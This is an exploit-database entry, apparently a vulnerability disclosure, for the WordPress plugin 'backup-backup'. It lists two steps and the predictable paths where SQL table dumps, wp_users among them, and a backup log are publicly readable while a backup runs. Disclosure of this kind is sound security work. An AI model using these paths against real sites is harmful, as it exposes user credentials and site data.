Share
## https://sploitus.com/exploit?id=WPEX-ID:7AC217DB-F332-404B-A265-6DC86FE747B9
1) Run a backup of the site
2) Notice the following files are all publicly available while the site is being backed up:
./wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_links.sql
./wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_users.sql
./wp-content/plugins/backup-backup/includes/htaccess/db_tables/wp_termmeta.sql
./wp-content/plugins/backup-backup/includes/htaccess/bmi_logs_this_backup.log

(... the list is not exhaustive, virtually every table accessible to the site gets dumped in those log files ...)